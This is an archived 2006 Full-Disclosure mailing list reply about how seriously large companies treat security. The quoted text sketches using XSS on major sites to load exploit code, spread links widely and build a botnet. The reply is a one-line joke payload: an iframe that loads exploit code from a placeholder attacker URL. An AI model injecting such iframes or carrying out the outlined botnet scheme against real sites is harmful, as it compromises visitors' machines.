Network Security: Detailed info on Re: [Full-disclosure] Do world's famous companies take care of theirsecu

Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.

Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.

Network Security FullDisclosure

[Top] [All Lists]

Re: [Full-disclosure] Do world's famous companies take care of theirsecu

from [Morning Wood] Network Security

[Permanent Link]

Subject:	Re: [Full-disclosure] Do world's famous companies take care of theirsecurity?
Date:	Mon, 31 Jul 2006 11:45:45 -0700

Does anybody happen to realize that XSS vulnerabilities make it simpler to
leverage other vulnerabilities?  I mean, credential stealing is only the
beginning.  Try loading WMF/JPEG/DCOM/AJAX/etc exploit code using an XSS
vulnerability on PayPal/Yahoo/Amazon/etc, sending the link off to millions
of people, and receiving several thousand bots to your IRC channel.

yes! all pray to <iframe src=http://HAXOR-URL/EXPLOIT></iframe>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[More messages with this same subject...]

<Prev in Thread]	Current Thread	[Next in Thread>
[Full-disclosure] Do world's famous companies take care of their security?, Valery Marchuk Re: [Full-disclosure] Do world's famous companies take care of their security?, n3td3v Re: [Full-disclosure] Do world's famous companies take care of their security?, n3td3v Re: [Full-disclosure] Do world's famous companies take care of their security?, Octal Re: [Full-disclosure] Do world's famous companies take care of theirsecurity?, Morning Wood <= Re: [Full-disclosure] Do world's famous companies take care of their security?, uncleron Re: [Full-disclosure] Do world's famous companies take care of their security?, Dude VanWinkle

Previous by Date:	Re: [Full-disclosure] n3td3v please shutup, please shutup., Valdis . Kletnieks
Next by Date:	[Full-disclosure] Re: [EEYEB-20060227] D-Link Router UPNP Stack Overflow, solutions_PHP
Previous by Thread:	Re: [Full-disclosure] Do world's famous companies take care of their security?, Octal
Next by Thread:	Re: [Full-disclosure] Do world's famous companies take care of their security?, uncleron
Indexes:	[Date] [Thread] [Top] [All Lists]